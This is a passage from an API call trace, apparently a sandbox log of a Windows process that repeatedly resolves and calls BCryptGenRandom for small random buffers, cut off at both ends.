(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.132] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.132] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.135] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.135] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0227e, cbBuffer=0x15, dwFlags=0x2 | out: pbBuffer=0x3a0227e) returned 0x0 [0255.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.138] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.139] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.139] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02293, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a02293) returned 0x0 [0255.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.141] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.141] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.142] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.144] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.145] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022b2, cbBuffer=0x1f, dwFlags=0x2 | out: pbBuffer=0x3a022b2) returned 0x0 [0255.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.148] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.148] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.149] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.151] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.152] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.152] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.333] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.333] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.334] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a022d1, cbBuffer=0x2c, dwFlags=0x2 | out: pbBuffer=0x3a022d1) returned 0x0 [0255.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.335] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.335] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.337] BCryptGenRandom (in: hAlgorithm=0x0, 